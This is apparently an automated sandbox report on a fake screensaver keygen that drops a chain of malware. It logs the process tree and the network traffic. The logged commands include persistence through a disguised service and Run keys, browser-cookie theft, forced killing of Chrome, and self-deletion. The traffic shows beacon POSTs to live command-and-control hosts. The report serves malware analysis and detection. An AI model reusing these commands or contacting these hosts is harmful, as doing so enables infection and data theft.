PID 2944 wrote to memory of 4040	2944	aliens.exe	101
PID 2156 wrote to memory of 560	2156	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe
"C:\Users\Admin\AppData\Local\Temp\Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1456
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
    intro.exe 1O5ZF
    3⤵
    - Executes dropped EXE
    PID:2068
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1768
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2064
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:1572
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3132
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3928
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3040
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:2096
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2076
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:700
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3884
    - - C:\Users\Admin\AppData\Local\Temp\sib826D.tmp\0\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sib826D.tmp\0\setup.exe" -s
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2280
      - C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe
        
        "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2944
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        7⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
        
        C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 0011 installp1
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:2328
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2840
        
        C:\Users\Admin\AppData\Roaming\1605715653158.exe
        
        "C:\Users\Admin\AppData\Roaming\1605715653158.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715653158.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1396
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3276
        
        C:\Users\Admin\AppData\Roaming\1605715657408.exe
        
        "C:\Users\Admin\AppData\Roaming\1605715657408.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715657408.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3488
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:564
        
        C:\Users\Admin\AppData\Roaming\1605715663049.exe
        
        "C:\Users\Admin\AppData\Roaming\1605715663049.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715663049.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1268
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:992
        
        C:\Users\Admin\AppData\Roaming\1605715665799.exe
        
        "C:\Users\Admin\AppData\Roaming\1605715665799.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605715665799.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
        
        C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetWindowsHookEx
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetWindowsHookEx
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe
        
        C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe /silent
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\is-TQGP2.tmp\1021C014A4C9A552.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-TQGP2.tmp\1021C014A4C9A552.tmp" /SL5="$90038,761193,121344,C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe" /silent
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2480
        
        C:\Program Files (x86)\RearRips\seed.sfx.exe
        
        "C:\Program Files (x86)\RearRips\seed.sfx.exe" -pK2j8l614 -s1
        10⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        
        PID:3568
        
        C:\Program Files (x86)\Seed Trade\Seed\seed.exe
        
        "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2464
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/14Ahe7"
        10⤵
        Checks computer location settings
        
        PID:3352
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
        8⤵
        
        PID:912
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe
        
        C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe 200 installp1
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Checks SCSI registry key(s)
        Suspicious use of SetWindowsHookEx
        
        PID:4040
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:3172
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe"
        8⤵
        
        PID:3056
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        9⤵
        Runs ping.exe
        
        PID:2560
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\fjkw1lb5cxpb\aliens.exe"
        7⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        8⤵
        Runs ping.exe
        
        PID:1220
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of AdjustPrivilegeToken
      PID:2116
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1272
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2156
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:560
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:2908
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        
        PID:3924
    - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1308

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 250E69250CC581C0E4EB0CB8AD8E9B0C C
  2⤵
  - Loads dropped DLL
  PID:2624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:304

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1692

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3540

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4120

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4640

C:\Users\Admin\AppData\Local\Temp\D5F0.exe
C:\Users\Admin\AppData\Local\Temp\D5F0.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:4904
- C:\Windows\SysWOW64\icacls.exe
  icacls "C:\Users\Admin\AppData\Local\e53c72c0-0784-423a-8049-005ad90d254b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
  2⤵
  - Modifies file permissions
  PID:412

C:\Users\Admin\AppData\Local\Temp\D814.exe
C:\Users\Admin\AppData\Local\Temp\D814.exe
1⤵
- Executes dropped EXE
PID:4924

C:\Users\Admin\AppData\Local\Temp\DCF7.exe
C:\Users\Admin\AppData\Local\Temp\DCF7.exe
1⤵
- Executes dropped EXE
PID:4952
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\llvmbdxh\
  2⤵
  PID:640
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\clfkcbws.exe" C:\Windows\SysWOW64\llvmbdxh\
  2⤵
  PID:2920
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create llvmbdxh binPath= "C:\Windows\SysWOW64\llvmbdxh\clfkcbws.exe /d\"C:\Users\Admin\AppData\Local\Temp\DCF7.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:4888

C:\Users\Admin\AppData\Local\Temp\E053.exe
C:\Users\Admin\AppData\Local\Temp\E053.exe
1⤵
- Executes dropped EXE
PID:4980

C:\Users\Admin\AppData\Local\Temp\EBDD.exe
C:\Users\Admin\AppData\Local\Temp\EBDD.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5040

C:\Users\Admin\AppData\Local\Temp\F4B8.exe
C:\Users\Admin\AppData\Local\Temp\F4B8.exe
1⤵
- Executes dropped EXE
PID:4216

Network

DNS

a.kvaka.li

Remote address:

8.8.8.8:53

Request

a.kvaka.li

IN A

Response

a.kvaka.li

IN A

104.18.56.131

a.kvaka.li

IN A

104.18.57.131

a.kvaka.li

IN A

172.67.194.164
DNS

kvaka.li

Remote address:

8.8.8.8:53

Request

kvaka.li

IN A

Response

kvaka.li

IN A

104.18.56.131

kvaka.li

IN A

104.18.57.131

kvaka.li

IN A

172.67.194.164
POST

http://kvaka.li/1210776429.php

keygen-step-1.exe

Remote address:

104.18.56.131:80

Request

POST /1210776429.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: kvaka.li
Content-Length: 101
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:03:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d7c12c85b457ef513c4e1644a8027bfed1605715423; expires=Fri, 18-Dec-20 16:03:43 GMT; path=/; domain=.kvaka.li; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.7
X-Page-Speed: 1.13.35.2-0
Cache-Control: max-age=0, no-cache
CF-Cache-Status: DYNAMIC
cf-request-id: 067db209ef0000fa940886f000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DAxvqdy88KBN7176oNKRwIbpUeJP%2Fb6NSSixHF4S6Thh9tTh%2B8FxIyvpow%2B%2BId5xYRCyDDrLqq4Voa3p9MMPCxxRRSaPPMLN%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ec564ff8fa94-AMS
DNS

iplogger.org

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

88.99.66.31
DNS

ffdownload.online

Remote address:

8.8.8.8:53

Request

ffdownload.online

IN A

Response

ffdownload.online

IN A

194.54.83.254
POST

http://ffdownload.online/business/receive

002.exe

Remote address:

194.54.83.254:80

Request

POST /business/receive HTTP/1.1
User-Agent: Mozilla/4.0(compatible;MSIE7.0;WindowsNT5.1;360SE)
Host: ffdownload.online
Content-Length: 512
Connection: Close
Cache-Control: no-cache

Response

HTTP/1.1 200

Set-Cookie: JSESSIONID=c571e0c7-a019-44f6-adbe-c81b61e85275; Path=/; HttpOnly
Content-Length: 0
Date: Wed, 18 Nov 2020 16:03:45 GMT
Connection: close
GET

http://101.36.107.74/seemorebty/il.php?e=jg2_2qua

jg2_2qua.exe

Remote address:

101.36.107.74:80

Request

GET /seemorebty/il.php?e=jg2_2qua HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 101.36.107.74

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:03:55 GMT
Server: Apache/2.4.37 (centos)
X-Powered-By: PHP/7.2.24
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

8d96c6c8686c52e7.xyz

Remote address:

8.8.8.8:53

Request

8d96c6c8686c52e7.xyz

IN A

Response

8d96c6c8686c52e7.xyz

IN A

172.67.204.197

8d96c6c8686c52e7.xyz

IN A

104.18.42.86

8d96c6c8686c52e7.xyz

IN A

104.18.43.86
POST

http://8d96c6c8686c52e7.xyz/info/w

aliens.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d92b96971a01c5c5d52f6942ab842841b1605715439; expires=Fri, 18-Dec-20 16:03:59 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db2461000000c11b81bb000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=L1Ajt606%2B4ag2H0cr3EA2If96oF8lVLQ9fJMXNOtehsCm%2F0ZuSgJGOTOStwFJCWTqcxX%2B1K2aeoFld%2F%2F5qXn6aDVAeLInXRCT6sDqyr6BkRPYp0r4g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecb688d50c11-AMS
POST

http://8d96c6c8686c52e7.xyz/info/w

aliens.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dcb95ed94574dc0a597451bf969dbabaf1605715440; expires=Fri, 18-Dec-20 16:04:00 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db24c2e00000c116dbb0000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=WgtemL7Y6qRBjWlstDdbN9gRJJggnMkvocFVb%2B%2FtJd0d%2FoVt%2FMOixKdMEKI5yMUa%2F6dcPibMFWWH6P%2BMocOK4xsqeQ6jhhvYFxECtrhDKS0P4t2qWw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecc04e320c11-AMS
POST

http://8d96c6c8686c52e7.xyz/info/w

aliens.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d9ca5ac630f4f45160fc113a9072d23801605715443; expires=Fri, 18-Dec-20 16:04:03 GMT; path=/; domain=.8d96c6c8686c52e7.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 067db258fc00000c11b3930000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wxSzU0%2BDcJkreCPb13Q4q6l7t%2Bp%2FJvyDfOo8wMX7ADLmvh1X0F%2FOI13y9BC5Hb0OYz%2FtuaeBDzJKJw5Y1cJG1MbHhl1aFlqTlkMk%2B3kiZ%2BfkJfxHZA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f42ecd4ca9f0c11-AMS
GET

http://101.36.107.74/seemorebty/poe.php?e=jg2_2qua

jg2_2qua.exe

Remote address:

101.36.107.74:80

Request

GET /seemorebty/poe.php?e=jg2_2qua HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0
Host: 101.36.107.74

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:01 GMT
Server: Apache/2.4.37 (centos)
X-Powered-By: PHP/7.2.24
Content-Length: 0
Content-Type: text/html; charset=UTF-8
DNS

www.ipcode.pw

Remote address:

8.8.8.8:53

Request

www.ipcode.pw

IN A

Response

www.ipcode.pw

IN A

0.0.0.0
DNS

www.fddnice.pw

Remote address:

8.8.8.8:53

Request

www.fddnice.pw

IN A

Response

www.fddnice.pw

IN A

103.155.92.58
GET

http://www.fddnice.pw/

askinstall21.exe

Remote address:

103.155.92.58:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.fddnice.pw
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:02:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 11
Connection: keep-alive
X-Powered-By: PHP/5.6.40
DNS

www.zxfc.pw

Remote address:

8.8.8.8:53

Request

www.zxfc.pw

IN A

Response

www.zxfc.pw

IN A

185.104.114.70
POST

http://www.zxfc.pw/Home/Index/lkdinl

askinstall21.exe

Remote address:

185.104.114.70:80

Request

POST /Home/Index/lkdinl HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.zxfc.pw
Content-Length: 285
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2020 16:05:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.6.22
Set-Cookie: PHPSESSID=3g1cb6skv1hoo2u6fhdc4v6072; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
DNS

ip-api.com

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

hjjgaa.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
viewport-width: 1920
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Wed, 18 Nov 2020 16:04:07 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 322
Access-Control-Allow-Origin: *
X-Ttl: 54
X-Rl: 43
POST

http://8d96c6c8686c52e7.xyz/info/w

0B44010BDDEFEFD3.exe

Remote address:

172.67.204.197:80

Request

POST /info/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 81
Host: 8d96c6c8686c52e7.xyz

Response

HTTP/1.1 200 OK

